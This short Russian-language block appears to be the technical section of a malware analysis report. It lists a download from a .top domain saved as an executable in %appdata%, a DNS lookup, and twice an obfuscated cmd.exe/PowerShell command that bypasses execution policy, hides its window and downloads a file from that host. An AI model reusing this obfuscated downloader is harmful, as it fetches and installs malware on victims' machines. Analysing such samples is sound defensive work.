Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWE^rsHeLL.^exE ^-^exEC^utio^NPOLICy^ ^bY^p^a^ss -no^p^R^oFILe^ ^-wiND^ow^s^TYLE ^h^iDDeN^ (^NEW-oBJe^c^T s^ys^T^e^M.^NeT.^We^Bc^Li^e^NT^).dOwnload^FIle^(^'http://www.do...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "POWE^rsHeLL.^exE ^-^exEC^utio^NPOLICy^ ^bY^p^a^ss -no^p^R^oFILe^ ^-wiND^ow^s^TYLE ^h^iDDeN^ (^NEW-oBJe^c^T s^ys^T^e^M.^NeT.^We^Bc^Li^e^NT^).dOwnload^FIle^(^'http://www.do...' (со скрытым окном)